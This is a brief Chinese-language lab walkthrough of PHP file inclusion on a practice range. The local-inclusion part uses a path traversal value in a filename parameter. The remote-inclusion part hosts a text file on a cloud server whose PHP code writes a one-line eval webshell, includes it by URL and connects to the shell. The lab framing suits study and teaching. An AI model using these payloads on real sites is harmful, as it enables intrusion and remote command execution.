本地文件包含
首先,在靶场根目录下创建一个php文件,内容是phpinfo();
其次,上传一个任意球星图片,会跳转到带有filename参数的php文件下
然后,将filename的参数改为可以访问到我们创建的php文件的地址
../../../../2.php
就可以访问到我们的phpinfo
远程文件包含
在进行远程文件包含时,要先修改两个参数
php.ini下的allow_url_include和allow_url_fopen两个参数改为On,前面的冒号也要删掉
(看自己是什么版本的PHP,要和版本对应)
进行任意图片提交
在云服务器上创建一个2.txt文件 内容是
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>
就是创建一个shell.php 文件,文件内容为一句话木马
然后,将filename的参数改为我们2.txt的地址
http://47.121.191.208/2.txt
回车后就可以在fileinclude目录下找到我们上传的shell.php文件
接下来使用连接工具进行webshell连接,成功连接